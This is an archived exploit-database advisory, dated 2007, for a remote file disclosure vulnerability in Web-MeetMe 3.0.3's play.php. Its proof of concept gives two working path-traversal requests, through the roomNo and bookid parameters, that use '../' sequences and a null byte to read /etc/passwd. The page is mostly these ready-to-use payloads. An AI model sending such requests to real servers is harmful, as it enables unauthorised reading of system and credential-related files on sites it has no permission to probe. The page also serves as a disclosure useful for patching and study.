Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability
# Published : 2007-11-29
# Author : Evil.Man
# Previous Title : Rayzz Script 2.0 Remote / Local File Inclusion Vulnerabilities
# Next Title : WebED 0.0.9 (index.php) Remote File Disclosure Vulnerability

/--------------------------------------------------------------------------
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|Download Script :                                                         |
| http://sourceforge.net/project/showfiles.php?group_id=164788             |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man@windowslive.com                                          |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com             |
--------------------------------------------------------------------------/

# www.Syue.com [2007-11-29]